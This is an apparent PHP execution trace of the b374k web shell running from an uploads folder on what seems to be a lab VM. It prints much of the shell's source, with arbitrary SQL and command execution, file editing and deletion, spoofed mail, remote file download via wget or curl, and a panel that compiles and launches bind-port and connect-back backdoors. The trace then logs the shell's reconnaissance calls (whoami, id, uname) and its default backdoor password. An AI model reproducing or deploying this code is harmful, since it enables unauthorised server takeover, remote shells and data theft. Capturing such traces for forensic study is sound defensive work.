type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <input type=\\"hidden\\" name=\\"table\\" value=\\"".$table."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $columns = array(); $msg = "<table class=\\"explore\\" style=\\"width:99%;\\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET[\'z\'])) $page = (int) $_GET[\'z\']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\\"padding:10px 0 0 6px;\\"> <form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <input type=\\"hidden\\" name=\\"table\\" value=\\"".$table."\\" /> Page <select class=\\"inputz\\" name=\\"z\\" onchange=\\"this.form.submit();\\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\\"".$i."\\">".$i."</option>"; if($i == $_GET[\'z\']) $head .= "<option value=\\"".$i."\\" selected=\\"selected\\">".$i."</option>"; } $head .= "</select><noscript><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET[\'submitquery\']) && ($_GET[\'sqlquery\'] != "")){ $db = $_GET[\'db\']; $query = magicboom($_GET[\'sqlquery\']); $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; <span class=\\"gaya\\">[</span> ok <span class=\\"gaya\\">]</span></p>"; $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\\"padding:0;margin:20px 6px 0 6px;\\">".$query."; <span class=\\"gaya\\">[</span> error <span class=\\"gaya\\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\\nSHOW VARIABLES;\\nSHOW STATUS;"; $msg = "<div style=\\"width:99%;padding:0 10px;\\"><form action=\\"?\\" method=\\"get\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input type=\\"hidden\\" name=\\"x\\" value=\\"mysql\\" /> <input type=\\"hidden\\" name=\\"sqlhost\\" value=\\"".$sqlhost."\\" /> <input type=\\"hidden\\" name=\\"sqluser\\" value=\\"".$sqluser."\\" /> <input type=\\"hidden\\" name=\\"sqlport\\" value=\\"".$sqlport."\\" /> <input type=\\"hidden\\" name=\\"sqlpass\\" value=\\"".$sqlpass."\\" /> <input type=\\"hidden\\" name=\\"db\\" value=\\"".$db."\\" /> <p><textarea name=\\"sqlquery\\" class=\\"output\\" style=\\"width:98%;height:80px;\\">".$query."</textarea></p> <p><input class=\\"inputzbut\\" style=\\"width:80px;\\" name=\\"submitquery\\" type=\\"submit\\" value=\\"Go !\\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\\"explore\\" style=\\"width:99%;\\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\\"text-align:center;\\">cant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php }} elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mail\')){ if(isset($_POST[\'mail_send\'])){ $mail_to = $_POST[\'mail_to\']; $mail_from = $_POST[\'mail_from\']; $mail_subject = $_POST[\'mail_subject\']; $mail_content = magicboom($_POST[\'mail_content\']); if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){ $msg = "email sent to $mail_to"; } else $msg = "send email failed"; } ?> <form action="?y=<?php echo $pwd; ?>&x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td> <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" /> mail to</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="b374k@fbi.gov" name="mail_from" /> from</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" /> subject</td></tr> <tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'phpinfo\')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\\"phpinfo\\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET[\'view\']) && ($_GET[\'view\'] != "")){ if(is_file($_GET[\'view\'])){ if(!isset($file)) $file = magicboom($_GET[\'view\']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\\"margin:6px 0 0 2px;line-height:20px;\\"> <tr><td>Filename</td><td><span id=\\"".clearspace($filn)."_link\\">".$file."</span> <form action=\\"?y=".$pwd."&view=$file\\" method=\\"post\\" id=\\"".clearspace($filn)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$filn."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$filn."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\\"?y=$pwd&edit=$file\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&delete=$file\\">delete</a> | <a href=\\"?y=$pwd&dl=$file\\">download</a> (<a href=\\"?y=$pwd&dlgzip=$file\\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\\"?y=".$pwd."&view=".$file."\\">text</a> | <a href=\\"?y=".$pwd."&view=".$file."&type=code\\">code</a> | <a href=\\"?y=".$pwd."&view=".$file."&type=image\\">image</a></td></tr> </table> "; if(isset($_GET[\'type\']) && ($_GET[\'type\']==\'image\')){ echo "<div style=\\"text-align:center;margin:8px;\\"><img src=\\"?y=".$pwd."&img=".$filn."\\"></div>"; } elseif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'code\')){ echo "<div class=\\"viewfile\\">"; $file = wordwrap(@file_get_contents($file),"240","\\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\\"viewfile\\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET[\'view\'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET[\'edit\']) && ($_GET[\'edit\'] != "")){ if(isset($_POST[\'save\'])){ $file = $_POST[\'saveas\']; $content = magicboom($_POST[\'content\']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time()); if(@fwrite($filez,$content)) $msg = "file saved <span class=\\"gaya\\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET[\'edit\']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("\'\'","\'",fgets($filez))); } @fclose($filez); } ?> <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> <?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'upload\')){ if(isset($_POST[\'uploadcomp\'])){ if(is_uploaded_file($_FILES[\'file\'][\'tmp_name\'])){ $path = magicboom($_POST[\'path\']); $fname = $_FILES[\'file\'][\'name\']; $tmp_name = $_FILES[\'file\'][\'tmp_name\']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST[\'uploadurl\'])){ $pilihan = trim($_POST[\'pilihan\']); $wurl = trim($_POST[\'wurl\']); $path = magicboom($_POST[\'path\']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?> <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'netsploit\')){ if (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'C\')) { $port = trim($_POST[\'port\']); $passwrd = trim($_POST[\'bind_pass\']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST[\'bind\']) && !empty($_POST[\'port\']) && !empty($_POST[\'bind_pass\']) && ($_POST[\'use\'] == \'Perl\')) { $port = trim($_POST[\'port\']); $passwrd = trim($_POST[\'bind_pass\']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'C\')) { $ip = trim($_POST[\'ip\']); $port = trim($_POST[\'backport\']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'Perl\')) { $ip = trim($_POST[\'ip\']); $port = trim($_POST[\'backport\']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[\'expcompile\']) && !empty($_POST[\'wurl\']) && !empty($_POST[\'wcmd\'])) { $pilihan = trim($_POST[\'pilihan\']); $wurl = trim($_POST[\'wurl\']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv(\'REMOTE_ADDR\')) ? (getenv(\'REMOTE_ADDR\')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'shell\')){ ?> <form action="?y=<?php echo $pwd; ?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST[\'submitcmd\'])) { echo @exe($_POST[\'cmd\']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET[\'delete\']) && ($_GET[\'delete\'] != "")){ $file = $_GET[\'delete\']; @unlink($file); } elseif(isset($_GET[\'fdelete\']) && ($_GET[\'fdelete\'] != "")){ @rmdir(rtrim($_GET[\'fdelete\'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET[\'mkdir\']) && ($_GET[\'mkdir\'] != "")){ $path = $pwd.$_GET[\'mkdir\']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?> </div> </body> </html> ' /var/www/html/uploads/403.php(1) : eval()'d code 194 0
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $ver = '1.01'
4 11 0 0.044334 713368 getenv 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'SERVER_SOFTWARE'
4 11 1 0.044361 713448
4 11 R 'Apache/2.4.52 (Ubuntu)'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $software = 'Apache/2.4.52 (Ubuntu)'
4 12 0 0.044406 713416 ini_get 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'safe_mode'
4 12 1 0.044429 713448
4 12 R FALSE
4 13 0 0.044451 713416 ini_get 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'safe_mode'
4 13 1 0.044473 713448
4 13 R FALSE
4 14 0 0.044493 713416 strtolower 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 FALSE
4 14 1 0.044516 713448
4 14 R ''
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $safemode = FALSE
4 15 0 0.044556 713416 php_uname 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 0
4 15 1 0.044579 713528
4 15 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $system = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4 16 0 0.044634 713528 substr 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 0 3
4 16 1 0.044662 713656
4 16 R 'Lin'
4 17 0 0.044683 713560 strtolower 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'Lin'
4 17 1 0.044705 713624
4 17 R 'lin'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $win = FALSE
4 18 0 0.044744 713528 exe 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'whoami'
5 19 0 0.044766 713528 function_exists 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'system'
5 19 1 0.044788 713568
5 19 R TRUE
5 20 0 0.044809 713528 ob_start 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 0
5 20 1 0.044830 730040
5 20 R TRUE
5 21 0 0.044850 730040 system 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'whoami'
5 21 1 0.046381 730112
5 21 R 'www-data'
5 22 0 0.046414 730040 ob_get_contents 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 0
5 22 1 0.046437 730080
5 22 R 'www-data\n'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff = 'www-data\n'
5 23 0 0.046481 730080 ob_end_clean 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 0
5 23 1 0.046503 713568
5 23 R TRUE
4 18 1 0.046524 713568
4 18 R 'www-data\n'
4 24 0 0.046547 713568 rapih 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'www-data\n'
5 25 0 0.046569 713568 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 '<br />' '' 'www-data\n'
5 25 1 0.046596 713664
5 25 R 'www-data\n'
5 26 0 0.046617 713568 trim 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'www-data\n'
5 26 1 0.046639 713640
5 26 R 'www-data'
4 24 1 0.046660 713608
4 24 R 'www-data'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $user = 'www-data'
4 27 0 0.046760 713568 exe 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'id'
5 28 0 0.046782 713568 function_exists 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'system'
5 28 1 0.046805 713608
5 28 R TRUE
5 29 0 0.046825 713568 ob_start 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 0
5 29 1 0.046847 730080
5 29 R TRUE
5 30 0 0.046867 730080 system 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'id'
5 30 1 0.048473 730192
5 30 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
5 31 0 0.048508 730080 ob_get_contents 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 0
5 31 1 0.048531 730160
5 31 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
5 32 0 0.048580 730160 ob_end_clean 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 0
5 32 1 0.048602 713648
5 32 R TRUE
4 27 1 0.048623 713648
4 27 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 33 0 0.048648 713648 rapih 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
5 34 0 0.048673 713648 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 '<br />' '' 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
5 34 1 0.048700 713744
5 34 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
5 35 0 0.048724 713648 trim 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
5 35 1 0.048747 713760
5 35 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
4 33 1 0.048771 713728
4 33 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $id = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $prompt = 'www-data $ '
4 36 0 0.048834 713688 getcwd 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 0
4 36 1 0.048856 713736
4 36 R '/var/www/html/uploads'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pwd = '/var/www/html/uploads/'
4 37 0 0.048897 713736 function_exists 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'posix_getpwuid'
4 37 1 0.048920 713776
4 37 R TRUE
4 38 0 0.048940 713736 function_exists 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'posix_getgrgid'
4 38 1 0.048962 713776
4 38 R TRUE
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $posix = TRUE
4 39 0 0.049001 713736 gethostbyname 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'localhost'
4 39 1 0.049057 713816
4 39 R '127.0.0.1'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $server_ip = '127.0.0.1'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $my_ip = '127.0.0.1'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $bindport = '13123'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $bindport_pass = 'b374k'
4 40 0 0.049154 713776 explode 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 2 '/' '/var/www/html/uploads/'
4 40 1 0.049178 714384
4 40 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pwds = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pwdurl = ''
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $i = 0
4 41 0 0.049266 714312 sizeof 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 41 1 0.049294 714344
4 41 R 6
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz = ''
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j = 0
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pathz .= '/'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $j++
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/"> / </a>'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $i++
4 42 0 0.049426 714392 sizeof 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 42 1 0.049454 714424
4 42 R 6
